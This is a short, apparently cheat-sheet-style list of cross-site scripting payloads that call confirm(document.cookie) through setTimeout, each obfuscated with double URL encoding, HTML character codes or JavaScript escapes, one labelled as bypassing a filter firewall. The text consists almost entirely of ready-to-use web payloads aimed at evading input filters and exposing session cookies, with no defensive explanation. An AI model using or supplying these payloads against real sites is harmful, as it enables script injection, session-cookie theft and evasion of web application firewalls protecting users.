With double encode : con%2566irm%2528document%252Eco%256Fkie%2529
With HTML Code : a%26%2361confirm%26%2344b%26%2361document%26%2346co%26%23111kie%26%2344%26%2391b%26%2393%26%2346find%26%2340a%26%2341
With JS Escape : set\u0054imeout`con\u0066irm\u0028document\u002eco\u006fkie\u0029`
setTimeout`con\x66irm\x28document\x2eco\x6fkie\x29`

No Bypassed : setTimeout`confirm\x28document\xcookie)`
Filter Firewall Bypassed : s%5Cu0065t%5Cu0054imeo%5Cu0075t%26%2396con%5Cu0066irm%5Cu0028document%5Cu002eco%5Cu006fkie%5Cu0029%26%2396